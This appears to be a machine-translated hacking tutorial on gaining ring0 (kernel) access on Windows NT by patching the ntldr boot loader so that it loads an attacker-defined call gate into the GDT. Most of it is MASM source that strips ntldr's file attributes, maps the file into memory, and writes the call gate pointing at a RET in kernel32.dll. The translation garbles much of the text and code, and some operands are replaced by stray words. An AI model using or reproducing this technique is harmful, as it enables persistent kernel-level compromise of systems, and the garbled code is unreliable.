Let the program enter ring0 level for execution

In protection mode, ring0 has the highest permissions and has been a lot of hackers.ProgramOn the NT platform, Ms protects system tables and cannot directly modify system tables like Win9x. However, there are still many ways to access ring0, for example, in China, the earliest sinister used the method of writing the driver to enter ring0, which is also the most common method, webcrazy uses the method of reading and writing physical memory to read and write the physical memory where gdt is located, and generates its own call door on gdt to freely access ring0. Later, MgF proposed an update method, which is the method I want to introduce and modified ntldr.

Why do you need to modify ntldr? Because when Windows starts, it needs to load the descriptor on gdt, while the NT pilot program is ntldr, which means the descriptor may be in ntldr, if our assumption is true, we can find the system descriptor in ntldr. Well, let's first make an experiment and use ue to open ntldr, search for the hexadecimal number FFFF 0000 009a cf00 (this is a descriptor on gdt, and its selection is 8 h). We found the result, which proves that the idea is correct, looking back, we found that there are still many descriptors. Haha, if we add our own call door and our own system descriptor in the hollow area of the searched descriptor area, when the system restarts, our call door will be loaded into the memory by the operating system, so that we have the call door we need, you can use this call door to freely access ring0. Some people may ask why the system does not need to select the descriptor corresponding to the sub-08h, but instead generates its own selector and descriptor. This is because the call gate points Code Generally, it is in the user zone, and MS will perform detection. If the code running in the selected child 8 hours is less than 0x80000000, it will be deemed as illegal access to ring0, and an exception will occur. See the code below. Modify ntldr to add a call door and run any ring0 code. 386. model flat, stdcalloption Casemap: None include D:/masm32/include/windows. incinclude D:/masm32/include/kernel32.incinclude D:/masm32/include/user32.inc includelib D:/masm32/lib/kernel32.libincludelib D:/masm32/lib/user32.lib. dataszfilename dB 'C:/ntldr', 0 dwattrib dd 0 hfile dd 0 hmap dd 0 pfile dd 0 dwfilesize dd 0dwc3code dd 0 gdtflag DW 0 ffffh, 0000, 9a00h, 00cfh, 0f Fffh, expires, 9200 H, 00cfh; first and second descriptors in gdt: callgate DW average, 0108 H, 0ec00h, average, 0 ffffh, 0000, 9a00h, 00cfh; the call gate and the callsel dd 0 DW 103 H of a system descriptor; The Selection Sub-of the call gate. code start: Push offset szfilename call getfileattributes; get the file attributes mov edX, eax Inc edX je error_getfileattrib; if an error is returned, exit mov dwattrib and eax; otherwise, save the file property push 80 h push offset szfilename call setfileattributes; set the file property to the general file call findc3code; search for the RET command P in kernel32.dll Ush 0 push 80 h Push 3 push 0 Push 3 push 0c0000000h push offset szfilename call createfilea; open the file mov edX, eax Inc edX je error_openfile mov hfile, eax push 0 push hfile call getfilesize mov dwfilesize, eax; get file size push 0 push 0 push 0 Push 4 push 0 push hfile call createfilemapping or eax, eax je error_filemap mov hmap, eax push 0 push 0 push 0 push 6 push eax call mapviewoffile; file ing to memory or eax, eax je Error_map mov pfile, eax mov EDI, eax mov ESI, offset gdtflag mov ECx, dwfilesize:; search for the descriptor Inc EDI push ESI push EDI push ECx mov ECx in ntldr, 10 h repz cmpsb pop ECx pop EDI pop esiloopnz @ B; after finding the flag, search for a space in gdt to store the call door or ECX, ECx je error_map XOR eax, eax mov ECx, 80 h: Sub EDI, 8 push EDI push ECx mov ECx, 8 repz scasb; Confirm position pop ECx pop EDI loopnz @ B or ECx again, ECX je error_map add EDI, 100 h Lea ESI, callga Te mov ECx, 10 h rep movsb; write call door mov edX, dwc3code mov word PTR [edi-16], dx shr edX, 16 mov word PTR [edi-10], DX; error_map: Push pfile call unmapviewoffile error_filemap: Push hmap call closehandle error_openfile: Push hfile call closehandle push dwattrib push offset szfilename call setfileattributes; restore file attributes: push 0 call exitprocess findc3code: Assume FS: Nothing mov Eax, FS: [30 h] mov eax, [eax + 0ch] mov ESI, [eax + 1ch] lodsd mov eax, [eax + 08 h]; eax-> Kernel32 base address mov EDI, eax add EDI, 1000 h; Search mov ECx, 20000 H mov Al, 0c3h from the code segment; Search RET command repnz scasb dec EDI mov dwc3code, edi ret end start: This program modifies ntldr and writes one of its own call doors and one system descriptor in the place where the first descriptor of gdt is offset by H. After restarting, our call will be loaded into gdt so that we can freely access ring0. In addition, the call door of this program points to a RET command in kernel32.dll. Why should we do this? Because first, let's take a look at what the CPU has done after using the call door. If a program uses the call door, the CPU will save all the registers, including eax, EBX, ECx, EDX, ESP, Cs, DS, es, FS, SS, EIP, etc. When turning to the call door, let's take a look at the stack structure eipring3 ESP .... As you can see, if we execute a RET command here, we can jump to the next command to call the door, and then switch back to our own program.